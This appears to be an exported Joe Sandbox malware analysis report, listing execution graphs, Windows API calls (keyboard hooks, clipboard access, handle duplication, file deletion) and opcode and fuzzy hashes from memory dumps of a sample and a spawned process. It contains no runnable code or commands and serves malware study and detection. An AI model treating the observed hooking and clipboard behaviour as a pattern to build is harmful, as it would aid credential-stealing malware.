                                            • Snapshot File: hcaresult_0_2_30fd000_26.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 25604ba9e58c2e8534c088f8a1173416213ff63d16121f32ff2f72be1fe7c6af
                                            • Instruction ID: fd5c77fd2db1b2f2b3e32b32cd505e15a71b3477473fe0c1867946ff727cbc9d
                                            • Opcode Fuzzy Hash: 25604ba9e58c2e8534c088f8a1173416213ff63d16121f32ff2f72be1fe7c6af
                                            • Instruction Fuzzy Hash: E5210471604200DFDB14DF14D9C4B2ABFA5FB84314F24CAADEA0A4B75AC33AD447CA61
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1704560757.00000000030FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 030FD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30fd000_26.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 98571ca9a1c7f91300579d2d0c28915f0b47492da43f47c56a0bd8c2adb485b6
                                            • Instruction ID: a2928248bbfa4b0fca1e43c42877a4cfcf8bce3939da4e55ea8cf89d23af57d2
                                            • Opcode Fuzzy Hash: 98571ca9a1c7f91300579d2d0c28915f0b47492da43f47c56a0bd8c2adb485b6
                                            • Instruction Fuzzy Hash: AA21A4755093808FCB12CF24D994715BFB1EB46214F28C5DAD9498F6A7C33AD40ACB62
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1704069186.000000000163D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0163D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_163d000_26.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                            • Instruction ID: e9d4812ef422c9a556e73142f587e7b54e9642e1653bfc5b533dfe5eebf226b9
                                            • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                            • Instruction Fuzzy Hash: 1C11E172504280CFCB02CF54D9C4B16BF71FB84328F24C6A9D8090B256C336D45ACBA1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1704069186.000000000163D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0163D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_163d000_26.jbxd
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1704069186.000000000163D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0163D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_163d000_26.jbxd
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1708887931.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7980000_26.jbxd
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1707324695.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58f0000_26.jbxd
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1704923028.0000000003240000.00000040.00000800.00020000.00000000.sdmp, Offset: 03240000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_3240000_26.jbxd
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1707324695.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58f0000_26.jbxd

                                            Execution Graph

                                            Execution Coverage:10.7%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:1.6%
                                            Total number of Nodes:191
                                            Total number of Limit Nodes:23

                                            Control-flow Graph

                                            APIs
                                            • SetWindowsHookExA.USER32(0000000D,00000000,?,?,?,?,?,?,?,?,?,0569FC90,00000000,00000000), ref: 0569FEA3
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4146376795.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5690000_26.jbxd
                                            Similarity
                                            • API ID: HookWindows
                                            • String ID:
                                            • API String ID: 2559412058-0

                                            Control-flow Graph

                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05698AAA
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4146376795.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5690000_26.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0

                                            Control-flow Graph

                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05698AAA
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4146376795.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5690000_26.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0

                                            Control-flow Graph

                                            APIs
                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 0569D649
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4146376795.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5690000_26.jbxd
                                            Similarity
                                            • API ID: CallProcWindow
                                            • String ID:
                                            • API String ID: 2714655100-0

                                            Control-flow Graph

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4146376795.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5690000_26.jbxd
                                            Similarity
                                            • API ID: Clipboard
                                            • String ID:
                                            • API String ID: 220874293-0

                                            Control-flow Graph

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4146376795.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5690000_26.jbxd
                                            Similarity
                                            • API ID: Clipboard
                                            • String ID:
                                            • API String ID: 220874293-0

                                            Control-flow Graph

                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0569C77F
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4146376795.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5690000_26.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0

                                            Control-flow Graph

                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0569C77F
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4146376795.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5690000_26.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0

                                            Control-flow Graph

                                            APIs
                                            • DeleteFileW.KERNELBASE(00000000), ref: 00E572C8
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4138513589.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_e50000_26.jbxd
                                            Similarity
                                            • API ID: DeleteFile
                                            • String ID:
                                            • API String ID: 4033686569-0

                                            Control-flow Graph

                                            APIs
                                            • SetWindowsHookExA.USER32(0000000D,00000000,?,?,?,?,?,?,?,?,?,0569FC90,00000000,00000000), ref: 0569FEA3
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4146376795.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5690000_26.jbxd
                                            Similarity
                                            • API ID: HookWindows
                                            • String ID:
                                            • API String ID: 2559412058-0

                                            Control-flow Graph

                                            APIs
                                            • DeleteFileW.KERNELBASE(00000000), ref: 00E572C8
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4138513589.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_e50000_26.jbxd
                                            Similarity
                                            • API ID: DeleteFile
                                            • String ID:
                                            • API String ID: 4033686569-0
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 05697956
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4146376795.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5690000_26.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 05697956
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4146376795.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5690000_26.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            APIs
                                            • OleInitialize.OLE32(00000000), ref: 0569E1E5
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4146376795.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5690000_26.jbxd
                                            Similarity
                                            • API ID: Initialize
                                            • String ID:
                                            • API String ID: 2538663250-0
                                            APIs
                                            • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,0569D89D), ref: 0569D927
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4146376795.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5690000_26.jbxd
                                            Similarity
                                            • API ID: CallbackDispatcherUser
                                            • String ID:
                                            • API String ID: 2492992576-0
                                            APIs
                                            • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,0569D89D), ref: 0569D927
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4146376795.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5690000_26.jbxd
                                            Similarity
                                            • API ID: CallbackDispatcherUser
                                            • String ID:
                                            • API String ID: 2492992576-0
                                            APIs
                                            • OleInitialize.OLE32(00000000), ref: 0569E1E5
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4146376795.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5690000_26.jbxd
                                            Similarity
                                            • API ID: Initialize
                                            • String ID:
                                            • API String ID: 2538663250-0
                                            APIs
                                            • OleInitialize.OLE32(00000000), ref: 0569E1E5
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4146376795.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5690000_26.jbxd
                                            Similarity
                                            • API ID: Initialize
                                            • String ID:
                                            • API String ID: 2538663250-0
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4137193545.0000000000DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DED000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_ded000_26.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4137193545.0000000000DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DED000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_ded000_26.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4137193545.0000000000DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DED000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_ded000_26.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4137193545.0000000000DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DED000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_ded000_26.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:

                                            Execution Graph

                                            Execution Coverage:8.7%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:54
                                            Total number of Limit Nodes:6

                                            Control-flow Graph

                                            APIs
                                            • GetCurrentProcess.KERNEL32 ref: 0143D3BE
                                            • GetCurrentThread.KERNEL32 ref: 0143D3FB
                                            • GetCurrentProcess.KERNEL32 ref: 0143D438
                                            • GetCurrentThreadId.KERNEL32 ref: 0143D491
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1830115456.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_1430000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: Current$ProcessThread
                                            • String ID:
                                            • API String ID: 2063062207-0

                                            Control-flow Graph

                                            APIs
                                            • GetCurrentProcess.KERNEL32 ref: 0143D3BE
                                            • GetCurrentThread.KERNEL32 ref: 0143D3FB
                                            • GetCurrentProcess.KERNEL32 ref: 0143D438
                                            • GetCurrentThreadId.KERNEL32 ref: 0143D491
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1830115456.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_1430000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: Current$ProcessThread
                                            • String ID:
                                            • API String ID: 2063062207-0

                                            Control-flow Graph

                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0143B2FE
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1830115456.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_1430000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0

                                            Control-flow Graph

                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 014359C9
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1830115456.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_1430000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0

                                            Control-flow Graph

                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 014359C9
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1830115456.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_1430000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0

                                            Control-flow Graph

                                            APIs
                                            • PostMessageW.USER32(?,?,?,?), ref: 076E1F75
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1833601524.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_76e0000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0

                                            Control-flow Graph

                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0143D60F
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1830115456.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_1430000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0

                                             Control-flow Graph
                                             • 143d588-143d61c (DuplicateHandle) -> 143d61e-143d624, 143d625-143d642
                                             • 143d61e-143d624 -> 143d625-143d642
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0143D60F
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1830115456.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_1430000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 906f916c6b021168128558432ae74511e3ad7fb5a9e476eaadbba2e51675e8d4
                                            • Instruction ID: c72ba4013500dc5e7bd7108b5b86675177c17e341c85fce834fb14ede585a8c1
                                            • Opcode Fuzzy Hash: 906f916c6b021168128558432ae74511e3ad7fb5a9e476eaadbba2e51675e8d4
                                            • Instruction Fuzzy Hash: 4821E4B5D002089FDB10CF9AD984ADEBFF8EB48310F14841AE918A3310D378A944CFA4

                                             Control-flow Graph
                                             • 143b298-143b2d8 -> 143b2da-143b2dd, 143b2e0-143b30b
                                             • 143b2da-143b2dd -> 143b2e0-143b30b
                                             • 143b2e0-143b30b (GetModuleHandleW) -> 143b30d-143b313, 143b314-143b328
                                             • 143b30d-143b313 -> 143b314-143b328
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0143B2FE
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1830115456.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_1430000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: ed8beb472f873db67609d322c8b878f59ac50dee16363fa34ac7a37070d343ae
                                            • Instruction ID: 1d6fd041558eaf5f151e5598a33f8ffb76a2196ce615d28704da5a66588a7903
                                            • Opcode Fuzzy Hash: ed8beb472f873db67609d322c8b878f59ac50dee16363fa34ac7a37070d343ae
                                            • Instruction Fuzzy Hash: E8110FB5C002498FDB10CF9AC844BDEFBF8EB88324F10842AD829A7210C379A545CFA5

                                             Control-flow Graph
                                             • 76e1f18-76e1f82 (PostMessageW) -> 76e1f84-76e1f8a, 76e1f8b-76e1f9f
                                             • 76e1f84-76e1f8a -> 76e1f8b-76e1f9f
                                            APIs
                                            • PostMessageW.USER32(?,?,?,?), ref: 076E1F75
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1833601524.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_76e0000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: ff397ecdfa70f9151efacab772d3aa44b456923b0e68f273c4a5f864c35905c8
                                            • Instruction ID: 536230649dcc18549aa7cc63ff583f89741bd631fb94833c41e70ab17257282e
                                            • Opcode Fuzzy Hash: ff397ecdfa70f9151efacab772d3aa44b456923b0e68f273c4a5f864c35905c8
                                            • Instruction Fuzzy Hash: A81103B5800349DFCB10CF9AC844BDEBBF8EB48320F10841AE558A7210C375A544CFA1

                                             Control-flow Graph
                                             • 76e1f10-76e1f82 (PostMessageW) -> 76e1f84-76e1f8a, 76e1f8b-76e1f9f
                                             • 76e1f84-76e1f8a -> 76e1f8b-76e1f9f
                                            APIs
                                            • PostMessageW.USER32(?,?,?,?), ref: 076E1F75
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1833601524.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_76e0000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: 7fd02dc55daba508626b956576ca0d2129a93f39a6c6a46e8619388816eb9db3
                                            • Instruction ID: ba0959d4643db8f0b947b6f666ade7acbcf5739f94b99ac9ffee27e4bed8d38c
                                            • Opcode Fuzzy Hash: 7fd02dc55daba508626b956576ca0d2129a93f39a6c6a46e8619388816eb9db3
                                            • Instruction Fuzzy Hash: D71103B5800349DFDB10CF99C589BDEBBF8EB08314F14881AE958B7210D375A544CFA1

                                             Control-flow Graph
                                             • 76e41f9-76e4265 (CloseHandle) -> 76e4267-76e426d, 76e426e-76e4296
                                             • 76e4267-76e426d -> 76e426e-76e4296
                                            APIs
                                            • CloseHandle.KERNELBASE(?), ref: 076E4258
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1833601524.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_76e0000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: CloseHandle
                                            • String ID:
                                            • API String ID: 2962429428-0
                                            • Opcode ID: 347216bdb0fda23972227429deb57a467fe2077f1f9709a86201426df559a772
                                            • Instruction ID: c1a2d127fc3311202075cc8e8a7d67f206e1c0e9af11fd5422b97632d39ea71d
                                            • Opcode Fuzzy Hash: 347216bdb0fda23972227429deb57a467fe2077f1f9709a86201426df559a772
                                            • Instruction Fuzzy Hash: FF1136B5800259CFCB10DF99C5457DEBBF4EF48320F14841AD568A7740D738A584CFA5
                                            APIs
                                            • CloseHandle.KERNELBASE(?), ref: 076E4258
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1833601524.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_76e0000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: CloseHandle
                                            • String ID:
                                            • API String ID: 2962429428-0
                                            • Opcode ID: 3250319c9dd44711ac0316a73d666359ee5f0150fa3ab369d1c97c413adde41d
                                            • Instruction ID: ec0b120de945c7d1a731152528f1b62cd39aca6231bd732771bb84acdb10a54d
                                            • Opcode Fuzzy Hash: 3250319c9dd44711ac0316a73d666359ee5f0150fa3ab369d1c97c413adde41d
                                            • Instruction Fuzzy Hash: 5A1103B5800259CFCB10DFAAC545BDEBBF8EB48320F10845AD969A7350D738A544CFA5
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1829915193.00000000013CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013CD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_13cd000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 65a5a63c5a8a1d9f770fbec34c535e0e23f0e829e2e2937decf079cc48e2e328
                                            • Instruction ID: 7366612c87179e69f68d15df12945a218fc5f97734510bf054e318c72d472fbd
                                            • Opcode Fuzzy Hash: 65a5a63c5a8a1d9f770fbec34c535e0e23f0e829e2e2937decf079cc48e2e328
                                            • Instruction Fuzzy Hash: 3C2100B1100204DFDB01DF48D9C0B66FF69EB88728F20C17DEA0A5A256C736E846CBA1
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1829915193.00000000013CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013CD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_13cd000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 14cb129749462ffb8ff3c3778c65777bae87557c568bb055d97e1ac942056c1d
                                            • Instruction ID: 5ba05edf4e25bdcd1008d2daa967c3c302dcabc3d000594a59f7db3b67699108
                                            • Opcode Fuzzy Hash: 14cb129749462ffb8ff3c3778c65777bae87557c568bb055d97e1ac942056c1d
                                            • Instruction Fuzzy Hash: 8D21ED72500244DFDB05EF58D980B2ABF65EB98B18F20C57DE9090A256C336D856CBA2
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1829960128.00000000013DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013DD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_13dd000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8b0f5d1514423aa1323a7657c043aff3f87509e2b2f00e47d688fbd73b2bbe2a
                                            • Instruction ID: 2ed579438782dd83e805099dff40a12e95663d53f8235ce356660f1741eb3630
                                            • Opcode Fuzzy Hash: 8b0f5d1514423aa1323a7657c043aff3f87509e2b2f00e47d688fbd73b2bbe2a
                                            • Instruction Fuzzy Hash: 74212272604204DFCB15DF68E984B26BFA5FBC8318F20C56DE80A4B296C33AD447CA61
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1829960128.00000000013DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013DD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_13dd000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d41474449021aba6c1261ce4e4829ad3fa408ae4abebaec4f5eebd36ff9ac012
                                            • Instruction ID: 6303f4aca7ec4d911e342b56e3a4d6baaf25cc8c3e89a6ba9ba4ac39331623ca
                                            • Opcode Fuzzy Hash: d41474449021aba6c1261ce4e4829ad3fa408ae4abebaec4f5eebd36ff9ac012
                                            • Instruction Fuzzy Hash: 9A21A1765093808FDB13CF24D994715BF71EB85218F28C5EAD8498F6A7C33AD40ACB62
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1829915193.00000000013CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013CD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_13cd000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                            • Instruction ID: da652c4296b90b9ed4d65fb55388e557be35d8aad2fcda6cb2d21c8072a6d356
                                            • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                            • Instruction Fuzzy Hash: AE11E176404280CFCB02CF54D9C4B16BF71FB94718F24C6ADE8090B256C336D85ACBA1
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1829915193.00000000013CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013CD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_13cd000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                            • Instruction ID: b5f265e443326748fbc8b030dfa9c82b5de4b417239e58c8abb6294c72d5572c
                                            • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                            • Instruction Fuzzy Hash: 6211CD72404240DFDB02CF44D9C4B56BF61FB94228F24C2ADE9090A256C33AE85ACBA1
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1829915193.00000000013CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013CD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_13cd000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fd9c6670078da5d9cf24e78a53aa285297e0704e35d2d2de5e59d7197635fbaf
                                            • Instruction ID: 3a5f29421e15c88d1cb074934cd6c7386f66789f821a0769b60f127e1e97fbf9
                                            • Opcode Fuzzy Hash: fd9c6670078da5d9cf24e78a53aa285297e0704e35d2d2de5e59d7197635fbaf
                                            • Instruction Fuzzy Hash: F7018F710083889AE7119EA9CD84767BF9CEF41B29F18C53EFD095A296D2799C40C7B1
                                            Memory Dump Source
